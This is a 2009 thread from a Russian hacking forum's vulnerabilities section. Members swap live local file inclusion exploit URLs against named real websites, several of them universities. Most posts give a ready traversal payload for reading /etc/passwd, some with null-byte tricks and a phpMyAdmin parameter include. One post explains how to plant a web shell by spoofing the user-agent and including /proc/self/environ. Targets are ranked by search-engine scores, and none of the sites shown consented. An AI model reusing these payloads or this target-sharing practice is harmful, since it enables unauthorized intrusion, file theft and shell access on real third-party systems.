HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.08.2009, 17:29
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.centerforloss.com/articles.php?file=
Локальный инклюд.
До /etc/passwd несмог пробраться, на хостинге фильтр.

Цитата:
http://www.matchmaking.at/athen2008/index.php?file=
локальный инклюд.
что то ненашёл /etc/passwd

Цитата:
http://www.westbalkanresearch.net/index.php?file=
Такая же беда

Последний раз редактировалось Ctacok; 05.08.2009 в 17:37..
 
Ответить с цитированием

  #2  
Старый 06.08.2009, 09:51
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

PR4

LFI

Код:
http://www.akademiaurody.com/index.php?id=[LFI]
 
Ответить с цитированием

  #3  
Старый 07.08.2009, 12:57
FireFenix
Постоянный
Регистрация: 03.06.2009
Сообщений: 385
Провел на форуме:
3178262

Репутация: 389
По умолчанию

LFI

тИЦ 240
PR 5/10
Код:
http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd
 
Ответить с цитированием

  #4  
Старый 07.08.2009, 15:00
FireFenix
Постоянный
Регистрация: 03.06.2009
Сообщений: 385
Провел на форуме:
3178262

Репутация: 389
По умолчанию

На форуме нашёл тока sql-inj к сайту, поэтому выложу php-inj

LFI
Код:
http://www.uvm.edu/student_life/?Page=../phpinfo.php
 
Ответить с цитированием

  #5  
Старый 08.08.2009, 02:17
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd
 
Ответить с цитированием

  #6  
Старый 13.08.2009, 17:26
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.halalapalooza.com/d.php?id=[LFI]
 
Ответить с цитированием

  #7  
Старый 14.08.2009, 16:08
pi7dets
Новичок
Регистрация: 14.08.2009
Сообщений: 1
Провел на форуме:
10366

Репутация: 5
По умолчанию

Код:
http://www.ksu.ru/f9/k2/new/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00
PR7, тИЦ 2100
 
Ответить с цитированием

  #8  
Старый 15.08.2009, 18:43
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Пхп-инъекция на сайте aphorism-list.com с возможностью залить шелл.

http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../proc/self/environ%00

Шел без проблем льется при подмене user-agent и инклудом /proc/self/environ (кто читал последнего хакера точно поймет)

Кстати, на хостинге лежит дистрибутив windows xp sp3)

И еще, подскажите, почему не всегда можно заинклудить /proc/self/environ (естественно системы никсовые)? Прав не хватает?
 
Ответить с цитированием

  #9  
Старый 15.08.2009, 22:37
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

http://www.leonardo-co.com/index.php?folder=Career&page=../../../../../../../../../../etc/passwd
http://www.bonnarealty.com/home.php?inc=../../../../../../../../etc/passwd
 
Ответить с цитированием

  #10  
Старый 16.08.2009, 16:15
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

http://www.tallinnamerepaevad.ee/est.php?page=../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ